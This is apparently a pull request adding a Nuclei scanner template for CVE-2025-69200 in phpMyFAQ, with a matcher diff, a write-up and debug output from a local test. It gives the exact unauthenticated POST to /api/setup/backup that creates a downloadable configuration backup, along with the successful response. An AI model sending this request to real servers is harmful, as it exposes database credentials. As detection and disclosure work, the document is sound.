### PR TITLE
added CVE-2025-69200 phpMyFAQ Unauthenticated Configuration Backup Di…

### DIFF
--- a/http/cves/2025/CVE-2025-69200.yaml
+++ b/http/cves/2025/CVE-2025-69200.yaml
@@ -1,7 +1,7 @@
 id: CVE-2025-69200
 
 info:
-  name: phpMyFAQ - Unauthenticated Configuration Backup Disclosure
+  name: phpMyFAQ - Configuration Backup Disclosure
   author: Louay-075
   severity: high
   description: |
@@ -25,7 +25,7 @@ info:
     max-request: 1
     product: phpmyfaq
     vendor: phpmyfaq
-  tags: cve,cve2025,phpmyfaq,backup,exposure,unauthenticated
+  tags: cve,cve2025,phpmyfaq,backup,exposure
 
 http:
   - raw:
@@ -39,16 +39,22 @@ http:
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
-          - '"backupFile"'
+          - '"backupFile":"'
           - '.zip'
         condition: and
 
       - type: word
-        negative: true
         words:
           - "error"
           - "forbidden"
+        negative: true
+
+      - type: word
+        part: content_type
+        words:
+          - application/json
 
     extractors:
       - type: json


### PR DESCRIPTION
---

### PR Information

This pull request adds a new Nuclei template for **CVE-2025-69200**, an unauthenticated configuration backup disclosure vulnerability in **phpMyFAQ**.

Affected versions (`<= 4.0.15`) allow unauthenticated attackers to trigger the setup backup mechanism via the `/api/setup/backup` endpoint.
The generated ZIP archive is stored in a web-accessible location and may contain sensitive configuration data, including database credentials.

The template performs a direct POST request to the vulnerable endpoint and reliably detects successful exploitation by identifying the returned backup file URL.

**References:**

* [https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-9cg9-4h4f-j6fg](https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-9cg9-4h4f-j6fg)
* [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69200](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69200)
* [https://nvd.nist.gov/vuln/detail/CVE-2025-69200](https://nvd.nist.gov/vuln/detail/CVE-2025-69200)

---

### Template validation

#### Additional Details

Template was validated against:

* A locally deployed vulnerable phpMyFAQ instance (≤ 4.0.15)
* A patched phpMyFAQ instance (≥ 4.0.16), which did not return a backup file

Below is sanitized `nuclei -debug` output confirming correct detection behavior.

---

### Debug output (sanitized)

```
nuclei -u http://127.0.0.1:8080 -t CVE-2025-69200.yaml -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.6.1

                projectdiscovery.io

[WRN] Found 1 templates loaded with deprecated protocol syntax, update before v3 for continued support.
[INF] Current nuclei version: v3.6.1 (latest)
[INF] Current nuclei-templates version: v10.3.6 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 176
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2025-69200] Dumped HTTP request for http://127.0.0.1:8080/api/setup/backup

POST /api/setup/backup HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.7 Mobile/15E148 Safari/604.1
Connection: close
Content-Length: 8
Accept: */*
Accept-Language: en
Content-Type: text/plain
Accept-Encoding: gzip

4.1.0-RC
[DBG] [CVE-2025-69200] Dumped HTTP response http://127.0.0.1:8080/api/setup/backup

HTTP/1.0 200 OK
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Methods: GET,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: no-cache, private
Connection: close
Content-Type: application/json
Date: Wed, 31 Dec 2025 09:36:13 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.4.65 (Debian)
Set-Cookie: PHPSESSID=dc954d8da8f2b48906fd663be89b4516; path=/; HttpOnly; SameSite=Strict
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
X-Powered-By: PHP/8.4.16

{"message":"\u2705 Backup successful","backupFile":"http:\/\/localhost:8080\/content\/core\/config\/phpmyfaq-config-backup.2025-12-31.zip"}
[CVE-2025-69200:status-1] [http] [high] http://127.0.0.1:8080/api/setup/backup ["http:\\/\\/localhost:8080\\/content\\/core\\/config\\/phpmyfaq-config-backup.2025-12-31.zip"]
[CVE-2025-69200:word-2] [http] [high] http://127.0.0.1:8080/api/setup/backup ["http:\\/\\/localhost:8080\\/content\\/core\\/config\\/phpmyfaq-config-backup.2025-12-31.zip"]
[CVE-2025-69200:regex-3] [http] [high] http://127.0.0.1:8080/api/setup/backup ["http:\\/\\/localhost:8080\\/content\\/core\\/config\\/phpmyfaq-config-backup.2025-12-31.zip"]
[INF] Scan completed in 1.7327368s. 3 matches found.

```

> No real-world vulnerable host information is included.

---